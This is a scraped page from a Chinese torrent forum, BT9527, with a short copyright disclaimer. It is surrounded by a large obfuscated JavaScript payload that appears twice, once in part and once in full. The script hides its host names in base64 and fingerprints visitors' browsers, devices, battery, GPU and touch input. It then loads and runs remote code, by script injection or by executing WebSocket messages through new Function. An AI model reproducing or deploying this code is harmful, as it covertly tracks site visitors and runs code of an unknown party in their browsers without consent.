b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tqZmtkbHNqZmRzLnN6ZmhsOTkuYY29t','d3NNzOi8vd3MuYXJ0cy1jbG91ZC5uZXQ6ODU4NNSx3c3M6Ly93cy5qaW5mdTIxLmNNvbTo4NNTg1',window,document,['Y','N']);}:function(){};
上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x45\x77\x59\x6e\x77\x4c\x44\x4f\x62\x63']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='wob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tqZmtkbHNqZmRzLnN6ZmhsOTkuYY29t','d3NNzOi8vd3MuYXJ0cy1jbG91ZC5uZXQ6ODU4NNSx3c3M6Ly93cy5qaW5mdTIxLmNNvbTo4NNTg1',window,document,['Y','N']);}:function(){};